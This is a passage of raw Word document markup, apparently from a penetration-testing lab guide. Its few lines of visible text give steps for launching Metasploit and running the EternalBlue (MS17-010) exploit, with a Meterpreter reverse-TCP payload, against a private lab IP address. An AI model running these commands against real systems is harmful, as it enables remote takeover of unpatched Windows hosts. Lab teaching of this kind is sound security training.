        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5020A465" wp14:editId="0F4F8E49">
                <wp:extent cx="5825045" cy="3819805"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="20398" name="Group 20398"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5825045" cy="3819805"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5825045" cy="3819805"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1566" name="Rectangle 1566"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5786945" y="3651098"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5E8C2BEF"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71" name="Picture 1571"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId22"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="14288" y="14351"/>
                            <a:ext cx="5731510" cy="3738880"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1572" name="Shape 1572"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5760085" cy="3767455"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5760085" h="3767455">
                                <a:moveTo>
                                  <a:pt x="0" y="3767455"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5760085" y="3767455"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="576008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98" style="width:458.665pt;height:300.772pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="58250,38198">
                <v:rect id="Rectangle 1566" style="position:absolute;width:506;height:2243;left:57869;top:36510;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 1571" style="position:absolute;width:57315;height:37388;left:142;top:143;" filled="f">
                  <v:imagedata r:id="rId23"/>
                </v:shape>
                <v:shape id="Shape 1572" style="position:absolute;width:57600;height:37674;left:0;top:0;" coordsize="5760085,3767455" path="m0,3767455l5760085,3767455l5760085,0l0,0x">
                  <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#ff0000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AEAAA2" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="255" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="37" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A1246F4" wp14:editId="2A3906F0">
                <wp:extent cx="5825045" cy="3820186"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="20399" name="Group 20399"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5825045" cy="3820186"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5825045" cy="3820186"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1567" name="Rectangle 1567"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5786945" y="3651479"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0330012C"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74" name="Picture 1574"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId24"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="14288" y="14351"/>
                            <a:ext cx="5731510" cy="3738880"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1575" name="Shape 1575"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5760085" cy="3767455"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5760085" h="3767455">
                                <a:moveTo>
                                  <a:pt x="0" y="3767455"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5760085" y="3767455"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="576008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99" style="width:458.665pt;height:300.802pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="58250,38201">
                <v:rect id="Rectangle 1567" style="position:absolute;width:506;height:2243;left:57869;top:36514;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 1574" style="position:absolute;width:57315;height:37388;left:142;top:143;" filled="f">
                  <v:imagedata r:id="rId25"/>
                </v:shape>
                <v:shape id="Shape 1575" style="position:absolute;width:57600;height:37674;left:0;top:0;" coordsize="5760085,3767455" path="m0,3767455l5760085,3767455l5760085,0l0,0x">
                  <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#ff0000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D4ECE3" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77906062" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="538" w:lineRule="auto"/>
        <w:ind w:right="4514"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Launch Metasploit Framework Command use: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CE77F9" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="258" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68CBE83F" wp14:editId="7199A887">
                <wp:extent cx="5848553" cy="4201846"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="19712" name="Group 19712"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5848553" cy="4201846"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5848553" cy="4201846"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1612" name="Rectangle 1612"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="007C73DA"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13" name="Rectangle 1613"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="457149" y="30121"/>
                            <a:ext cx="157694" cy="184382"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="48804EA5" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                                <w:jc w:val="left"/>
                              </w:pPr>
                              <w:r>
                                <w:t>m</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1614" name="Rectangle 1614"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="576021" y="30121"/>
                            <a:ext cx="764757" cy="184382"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="657D5DBD" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                                <w:jc w:val="left"/>
                              </w:pPr>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:t>sfconsole</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1615" name="Rectangle 1615"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1152093" y="0"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="37E767D3"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16" name="Rectangle 1616"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5810453" y="4033140"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="28706ED8"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27" name="Picture 1627"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId26"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="37795" y="396774"/>
                            <a:ext cx="5731510" cy="3738880"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1628" name="Shape 1628"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="23508" y="382550"/>
                            <a:ext cx="5760085" cy="3767455"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5760085" h="3767455">
                                <a:moveTo>
                                  <a:pt x="0" y="3767455"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5760085" y="3767455"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="576008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712" style="width:460.516pt;height:330.854pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="58485,42018">
                <v:rect id="Rectangle 1612" style="position:absolute;width:506;height:2243;left:0;top:0;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1613" style="position:absolute;width:1576;height:1843;left:4571;top:301;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve">m</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1614" style="position:absolute;width:7647;height:1843;left:5760;top:301;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve">sfconsole</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1615" style="position:absolute;width:506;height:2243;left:11520;top:0;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1616" style="position:absolute;width:506;height:2243;left:58104;top:40331;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 1627" style="position:absolute;width:57315;height:37388;left:377;top:3967;" filled="f">
                  <v:imagedata r:id="rId27"/>
                </v:shape>
                <v:shape id="Shape 1628" style="position:absolute;width:57600;height:37674;left:235;top:3825;" coordsize="5760085,3767455" path="m0,3767455l5760085,3767455l5760085,0l0,0x">
                  <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#ff0000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DD8CB6" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056BE256" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D6A3E8" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435ACAA1" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="274" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1C6A0B" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161CDC86" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="276" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C44C0D1" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A5FE59" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="273" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1B6FE1" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9FD285" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="537" w:lineRule="auto"/>
        <w:ind w:right="4514"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Select and Configure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Blue Command use: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ms17_010_eternalblue set RHOSTS 192.168.240.129 set LHOST 192.168.240.128 set PAYLOAD windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505C129B" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="37" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EE3359C" wp14:editId="5D8C712B">
                <wp:extent cx="5825045" cy="3819931"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="19852" name="Group 19852"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5825045" cy="3819931"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5825045" cy="3819931"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1677" name="Rectangle 1677"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5786945" y="3651225"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0241762C"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79" name="Picture 1679"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId28"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="14288" y="14351"/>
                            <a:ext cx="5731510" cy="3738880"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1680" name="Shape 1680"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5760085" cy="3767455"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5760085" h="3767455">
                                <a:moveTo>
                                  <a:pt x="0" y="3767455"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5760085" y="3767455"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="576008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52" style="width:458.665pt;height:300.782pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="58250,38199">
                <v:rect id="Rectangle 1677" style="position:absolute;width:506;height:2243;left:57869;top:36512;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p>
                        <w:pPr>
                          <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 1679" style="position:absolute;width:57315;height:37388;left:142;top:143;" filled="f">
                  <v:imagedata r:id="rId29"/>
                </v:shape>
                <v:shape id="Shape 1680" style="position:absolute;width:57600;height:37674;left:0;top:0;" coordsize="5760085,3767455" path="m0,3767455l5760085,3767455l5760085,0l0,0x">
                  <v:stroke weight="2.25pt" endcap="flat" joinstyle="round" on="true" color="#ff0000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7742996D" w14:textId="77777777" w:rsidR="0086222C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="308"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6FDE741B" wp14:editId="441928D1">
                <wp:extent cx="5848553" cy="4150513"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="19900" name="Group 19900"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5848553" cy="4150513"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5848553" cy="4150513"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
